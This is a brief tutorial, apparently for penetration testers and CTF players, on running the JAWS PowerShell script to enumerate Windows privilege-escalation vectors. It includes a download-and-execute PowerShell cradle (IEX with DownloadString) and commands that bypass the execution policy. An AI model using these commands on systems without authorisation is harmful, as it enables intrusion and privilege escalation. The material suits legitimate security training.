JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.


How to

1. Download the script

  • git clone https://github.com/411Hall/JAWS.git
  • cd JAWS
  • ls

2. Start a web server

  • python3.9 -m http.server 9999

3. On the Windows computer start powershell

  • powershell
  • IEX(New-Object Net.WebClient).DownloadString('')

4. Note this time this server is not allowing some checks due to permissions. We can bypass the execution policy by running

  • powershell -ep bypass

5. Now you can try to run the script

  • .\jaws-enum.ps1

6. You can also save the output to a file

  • .\jaws-enum.ps1 -OutputFilename result.txt

7. It can be run directly from CMD

  • powershell.exe -ExecutionPolicy bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

8. Then just read the file

  • type JAWS-Enum.txt
  • type result.txt